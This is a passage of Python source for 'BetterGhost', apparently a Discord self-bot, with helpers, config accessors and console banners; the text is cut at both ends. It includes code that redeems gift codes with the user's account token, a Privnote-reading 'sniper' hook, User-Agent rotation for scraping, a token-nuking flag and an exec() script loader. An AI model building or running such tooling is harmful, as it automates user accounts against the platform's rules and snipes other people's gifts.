    """Show a desktop toast if enabled in config.

    Windows goes through plyer, macOS through pync; other platforms are
    silently ignored.
    """
    if not CONFIG["toastnotifications"]:
        return
    if sys.platform == "win32":
        plyer.notification.notify(
            title=title,
            message=message,
            app_name="BetterGhost",
            app_icon="icon.ico",
            timeout=duration,
            toast=True,
        )
    elif sys.platform == "darwin":
        pync.notify(message, title=title)
def claim_nitro(code, userToken):
    """Try to redeem Discord gift *code* with *userToken*.

    Returns "Valid Code" when the redeem response mentions nitro,
    otherwise "Invalid Code".
    """
    URL = f'https://discordapp.com/api/v6/entitlements/gift-codes/{code}/redeem'
    result = requests.post(URL, headers={'Authorization': userToken}).text
    return "Valid Code" if 'nitro' in result else "Invalid Code"
def read_privnote(url):
    """Fetch a Privnote's content via pyPrivnote."""
    # NOTE(review): `pn` is never bound — the `import pyPrivnote as pn`
    # line at the top of the file is commented out, so calling this raises
    # NameError.  Confirm whether the privnote sniper path still reaches it.
    content = pn.read_note(link=url)
    return content
def get_random_user_agent():
    """Return one User-Agent string drawn at random from a hard-coded pool.

    Used to vary the UA header on reddit scraping requests.
    NOTE(review): the pool contains several duplicate entries, which
    slightly skews the draw.
    """
    userAgents = ["Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3075.83 Safari/537.32", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 8.0; WOW64) AppleWebKit/536.24 (KHTML, like Gecko) Chrome/32.0.2019.89 Safari/536.24", "Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.41 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3058.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2599.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/27.0.1453.0 Safari/537.35", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.139 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9757 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2151.2 Safari/537.36", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1204.0 Safari/537.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/67.0.3387.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9757 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3359.181 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3251.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538 (KHTML, like Gecko) Chrome/36 Safari/538", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.355.0 Safari/533.3", "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.4 Safari/532.0", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/27.0.1453.0 Safari/537.35", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3359.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3057.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 TC2", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3058.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2531.0 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36,gzip(gfe)", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2264.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.150 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.45 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2714.0 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1864.6 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Avast/70.0.917.102", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1615.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.14", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3608.0 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3251.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/54.2.133 Chrome/48.2.2564.133 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2427.7 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.61 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.45 Safari/537.36", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.104 Safari/537.36", "24.0.1284.0.0 (Windows NT 5.1) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.1284.0.3.742.3 Safari/534.3", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview) Chrome/27.0.1453 Safari/537.36,gzip(gfe)", "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.29 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.45 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.45", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.150 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.102 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2419.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Chrome/36.0.1985.125 CrossBrowser/36.0.1985.138 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1204.0 Safari/537.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36#", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Chrome/5.0.335.0 Safari/533.16", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.68 Safari/537.36", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2700.0 Safari/537.36#", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.114 Safari/537.36", "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538 (KHTML, like Gecko) Chrome/36 Safari/538", "Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (X11; Linux x86_64; 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/17.0.1410.63 Safari/537.31", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2583.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2151.2 Safari/537.36", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/536.36 (KHTML, like Gecko) Chrome/67.2.3.4 Safari/536.36", "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.5", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.69 Safari/537.36", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Safari/537.36 EdgA/41.0.0.1662", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1"]
    userAgent = random.choice(userAgents)
    return userAgent
def avatarUrl(id, avatar):
    """Build the Discord CDN URL for a user's avatar.

    If *avatar* already looks like a URL it is returned unchanged.
    Animated avatar hashes (``a_`` prefix) resolve to ``.gif``; all
    other hashes resolve to ``.png``.
    """
    avatar_hash = str(avatar)
    if avatar_hash.startswith("http"):
        return avatar
    ext = "gif" if avatar_hash.startswith("a_") else "png"
    return f"https://cdn.discordapp.com/avatars/{id}/{avatar}.{ext}?size=1024"
def iconUrl(id, icon):
    """Build the Discord CDN URL for a guild icon hash.

    Bug fix: the original computed ``url`` but then returned the raw
    ``icon`` argument, so the built URL was dead code.  Now returns the
    URL, mirroring ``avatarUrl``.
    """
    # NOTE(review): guild icons usually live under /icons/ on the Discord
    # CDN rather than /avatars/ — kept as written pending confirmation
    # against the callers of this helper.
    if str(icon).startswith("a_"):
        url = f"https://cdn.discordapp.com/avatars/{id}/{icon}.gif?size=1024"
    else:
        url = f"https://cdn.discordapp.com/avatars/{id}/{icon}.png?size=1024"
    return url
def resource_path(relative_path):
    """Resolve a bundled resource path.

    PyInstaller support (``sys._MEIPASS`` lookup) was deliberately
    disabled here; the path is currently returned untouched.
    """
    return relative_path
def get_friends(token):
    """Return the user objects of every friend (relationship type 1).

    Queries the account's relationships endpoint with *token* as the
    Authorization header.
    """
    response = requests.get(
        "https://discord.com/api/users/@me/relationships",
        headers={"Authorization": token},
    )
    return [entry["user"] for entry in response.json() if entry["type"] == 1]
async def constant_input(bot):
    """Read commands from stdin forever and invoke the matching bot command.

    Runs inside its own event loop on a background thread (see the nested
    ``constant_input2`` in ``on_connect``), so the blocking ``input()``
    only stalls that thread.  A command is console-runnable when one of
    its aliases contains the marker substring "consolecommand".
    """
    while True:
        message = input().lower()
        cmd = ""
        try:
            # Invoking a command needs a Context; borrow one from the most
            # recently cached message.
            msgs = bot.cached_messages
            ctx = await bot.get_context(msgs[0])
        except IndexError:
            print("Couldnt get context from cached message. Send a message in discord and try again.")
        else:
            consoleCommand = False
            for command in bot.commands:
                if command.name == message:
                    # Look for the marker alias; remember it so the command
                    # can be re-resolved by that alias below.
                    for alias in command.aliases:
                        if "consolecommand" in alias.lower():
                            consoleCommand = True
                            cmd = alias
                            break
            if consoleCommand:
                await ctx.invoke(bot.get_command(cmd))
            else:
                print("That command can't be ran in the console.")
class Config():
    """Accessors for ``config.json`` plus setters that also mutate the
    module-level ``__token__`` / ``__prefix__`` / theme globals.

    NOTE(review): every method below ``__init__`` takes no ``self`` and is
    invoked as a plain function via the class, e.g. ``Config.getConfig()``.
    Calling them on an *instance* would raise a TypeError.
    """
    def __init__(self):
        # Snapshot of config.json taken at construction time.
        self.json = json.load(open("config.json"))
        self.token = self.json["token"]
        self.prefix = self.json["prefix"]
        self.deleteTimeout = self.json["delete_timeout"]
        self.theme = self.json["theme"]
        self.giveawayJoinDelay = self.json["giveaway_join_delay"]
    def getConfig():
        # Re-reads the file on every call, so callers always see fresh values.
        return json.load(open("config.json"))
    def saveConfig(data):
        # Persist *data* back to config.json (key order preserved).
        return json.dump(data, open("config.json", "w"), indent=4, sort_keys=False)
    def changeToken(newToken):
        # Update both the in-memory global and the on-disk config.
        global __token__
        __token__ = newToken
        cfg = Config.getConfig()
        cfg["token"] = newToken
        Config.saveConfig(cfg)
    def changePrefix(newPrefix):
        # Also retargets the live bot's prefix immediately.
        global __prefix__
        __prefix__ = newPrefix
        BetterGhost.command_prefix = newPrefix
        cfg = Config.getConfig()
        cfg["prefix"] = newPrefix
        Config.saveConfig(cfg)
    def changeDeleteTimeout(newDeleteTimeout):
        # Coerced to int; raises ValueError on non-numeric input.
        global __deletetimeout__
        newDeleteTimeout = int(newDeleteTimeout)
        __deletetimeout__ = newDeleteTimeout
        cfg = Config.getConfig()
        cfg["delete_timeout"] = newDeleteTimeout
        Config.saveConfig(cfg)
    def changeGiveawayJoinDelay(newJoinDelay):
        # Coerced to int; raises ValueError on non-numeric input.
        global __giveawayjoindelay__
        newJoinDelay = int(newJoinDelay)
        __giveawayjoindelay__ = newJoinDelay
        cfg = Config.getConfig()
        cfg["giveaway_join_delay"] = newJoinDelay
        Config.saveConfig(cfg)
    def changeTheme(newTheme):
        # Loads themes/<name>.json repeatedly (once per field) and updates
        # every embed-styling global, then persists the theme choice.
        global __embedtitle__, __embedcolour__, __embedfooter__, __embedemoji__, __embedimage__, __embedfooterimage__, __embedcolourraw__, __theme__, __embedlargeimage__
        __embedtitle__ = json.load(open(f"themes/{newTheme}.json"))["embedtitle"]
        # Colour is stored as "#rrggbb"; convert to an int via 0x prefix.
        __embedcolour__ = int(json.load(open(f"themes/{newTheme}.json"))["embedcolour"].replace('#', '0x'), 0)
        __embedcolourraw__ = json.load(open(f"themes/{newTheme}.json"))["embedcolour"]
        __embedfooter__ = json.load(open(f"themes/{newTheme}.json"))["embedfooter"]
        __embedemoji__ = json.load(open(f"themes/{newTheme}.json"))["globalemoji"]
        __embedimage__ = json.load(open(f"themes/{newTheme}.json"))["embedimage"]
        __embedfooterimage__ = json.load(open(f"themes/{newTheme}.json"))["embedfooterimage"]
        __embedlargeimage__ = json.load(open(f"themes/{newTheme}.json"))["embedlargeimage"]
        __theme__ = newTheme
        cfg = Config.getConfig()
        cfg["theme"] = newTheme
        Config.saveConfig(cfg)
# Console colour palette.  On Windows the configured hex colour plus a fixed
# palette is built from RGB styles (presumably the `sty` package's
# Style/RgbFg — confirm against the file's imports); on Linux/macOS the same
# attribute names are filled with colorama foreground codes instead.
if sys.platform == "win32":
    ccolourred, ccolourgreen, ccolourblue = hex_to_rgb(__consolecolour__)
    fg.consoleColour = Style(RgbFg(ccolourred, ccolourgreen, ccolourblue))
    fg.cRed = Style(RgbFg(255, 81, 69))
    fg.cOrange = Style(RgbFg(255, 165, 69))
    fg.cYellow = Style(RgbFg(255, 255, 69))
    fg.cGreen = Style(RgbFg(35, 222, 57))
    fg.cBlue = Style(RgbFg(69, 119, 255))
    fg.cPurple = Style(RgbFg(177, 69, 255))
    fg.cPink = Style(RgbFg(255, 69, 212))
    fg.cGrey = Style(RgbFg(207, 207, 207))
    fg.cBrown = Style(RgbFg(199, 100, 58))
    fg.cBlack = Style(RgbFg(0, 0, 0))
    fg.cWhite = Style(RgbFg(255, 255, 255))
elif sys.platform == "linux" or sys.platform == "darwin":
    # colorama offers fewer colours, so several entries share a code
    # (orange/yellow, purple/pink); cWhite is RESET, not literal white.
    fg.consoleColour = colorama.Fore.BLUE
    fg.cRed = colorama.Fore.RED
    fg.cOrange = colorama.Fore.YELLOW
    fg.cYellow = colorama.Fore.YELLOW
    fg.cGreen = colorama.Fore.GREEN
    fg.cBlue = colorama.Fore.BLUE
    fg.cPurple = colorama.Fore.MAGENTA
    fg.cPink = colorama.Fore.MAGENTA
    fg.cGrey = colorama.Fore.WHITE
    fg.cBlack = colorama.Fore.BLACK
    fg.cWhite = colorama.Fore.RESET
# Clear the console, set the window title, and pick up the account's saved
# presence status.  Fix: the original issued the identical settings GET
# twice (once for the status code, once for the body); it is now fetched
# exactly once.
if is_windows():
    os.system("cls")
    os.system(f"title BetterGhost")
elif is_linux():
    os.system("clear")
_settings_response = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__})
if _settings_response.status_code == 200:
    status = _settings_response.json()["status"]
else:
    # Token invalid or API unreachable — fall back to a sane default.
    status = "online"
# Construct the self-bot with the user's prefix and restored presence, then
# initialise the module-level feature flags the event handlers consult.
BetterGhost = commands.Bot(command_prefix=__prefix__, self_bot=True, status=discord.Status.try_value(status))
BetterGhost.remove_command('help')
BetterGhost.launch_time = datetime.utcnow()
botStartTime = time.time()
# Known giveaway-bot IDs (source list defined earlier in the file).
giveawayBots = []
for index in GIVEAWAYBOTS:
    giveawayBots.append(int(index))
version = "2.3.8"
cycleStatusText = ""
cycleStatus = False
discordServer = "https://ghost.cool/invite/"
uwuifyEnabled = False
channelBlankChar = ""
spammingMessages = False
rickRollEnabled = False
nukingToken = False
consoleMode = __consolemode__
# Recognised banner styles; anything else falls back to the default banner.
consoleModes = ["new", "new2", "new3", "new4", "bear", "old", "react", "rise", "nighty", "rainbow"]
scriptsList = []
afkMode = CONFIG["afkmode"]["enabled"]
def include(filename):
    """Load and execute an external script file, recording it in scriptsList.

    SECURITY NOTE(review): this ``exec``s the file's full contents with
    access to the module globals — only trusted, user-authored script
    files must ever be passed here.
    """
    global scriptsList
    if os.path.exists(filename):
        scriptsList.append(filename)
        exec(codecs.open(filename, encoding="utf-8").read(), globals(), locals())
# hideText = "||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||"
if not __custommotd__:
motd = "Developed by Benny. Continued by ambient | Discontinued October 2021"
else:
motd = __custommotdtext__
@BetterGhost.event
async def on_connect():
    """Gateway connect handler.

    Initialises audio output, draws the console banner for the configured
    console mode, starts the background stdin-command thread, bumps a
    base64-obfuscated login counter, plays the connect sound, and
    (optionally) starts Discord rich presence.
    """
    # Only init the mixer when at least one audio device is present.
    if str(sounddevice.query_devices()) != "":
        pygame.mixer.init()
    width = os.get_terminal_size().columns
    if is_windows():
        os.system("cls")
        os.system(f"title BetterGhost [{version}] [{BetterGhost.user}]")
    if is_linux():
        os.system("clear")
    def constant_input2(bot):
        # Bridge: run the async stdin reader inside its own loop on a thread.
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        loop.run_until_complete(constant_input(bot))
        loop.close()
    threading.Thread(target=constant_input2, args=(BetterGhost,)).start()
    # --- banner: "new" ---
    if consoleMode.lower() == "new":
        print("")
        print(fg.consoleColour + "")
        print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
        print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
        print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
        print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
        print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
        print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    # --- banner: "rainbow" (same art, one colour per row) ---
    if consoleMode.lower() == "rainbow":
        print("")
        print(fg.consoleColour + "")
        print(fg.cRed + " ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
        print(fg.cOrange + "██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
        print(fg.cYellow + "██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
        print(fg.cGreen + "██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
        print(fg.cBlue + "╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
        print(fg.cPurple + " ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    # --- banner: "new2" ---
    if consoleMode.lower() == "new2":
        print("")
        print(fg.consoleColour + "")
        print(" ______ __ __ ______ ______ ______ ".center(width))
        print("/\ ___\ /\ \_\ \ /\ __ \ /\ ___\ /\__ _\ ".center(width))
        print("\ \ \__ \ \ \ __ \ \ \ \/\ \ \ \___ \ \/_/\ \/ ".center(width))
        print(" \ \_____\ \ \_\ \_\ \ \_____\ \/\_____\ \ \_\ ".center(width))
        print(" \/_____/ \/_/\/_/ \/_____/ \/_____/ \/_/ ".center(width))
        print(" ".center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    # --- banner: "new3" ---
    if consoleMode.lower() == "new3":
        print("")
        print(fg.consoleColour + "")
        print(" 88 ".center(width))
        print(" 88 ,d ".center(width))
        print(" 88 88 ".center(width))
        print(" ,adPPYb,d8 88,dPPYba, ,adPPYba, ,adPPYba, MM88MMM ".center(width))
        print('a8" `Y88 88P\' "8a a8" "8a I8[ "" 88 '.center(width))
        print('8b 88 88 88 8b d8 `"Y8ba, 88 '.center(width))
        print('"8a, ,d88 88 88 "8a, ,a8" aa ]8I 88, '.center(width))
        print(' `"YbbdP"Y8 88 88 `"YbbdP"\' `"YbbdP"\' "Y888 '.center(width))
        print(' aa, ,88 '.center(width))
        print(' "Y8bbdP" '.center(width))
        print("")
        print(fg.cWhite + f"{motd}".center(width))
        print(fg.consoleColour + '─'*width)
        print("")
    # --- banner: "new4" ---
    if consoleMode.lower() == "new4":
        print("")
        print(fg.consoleColour + "")
        print(" ▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ".center(width))
        print(" ███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ".center(width))
        print(" ███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ".center(width))
        print(" ▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ".center(width))
        print('▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ '.center(width))
        print(' ███ ███ ███ ███ ███ ███ ███ ███ '.center(width))
        print(' ███ ███ ███ ███ ███ ███ ▄█ ███ ███ '.center(width))
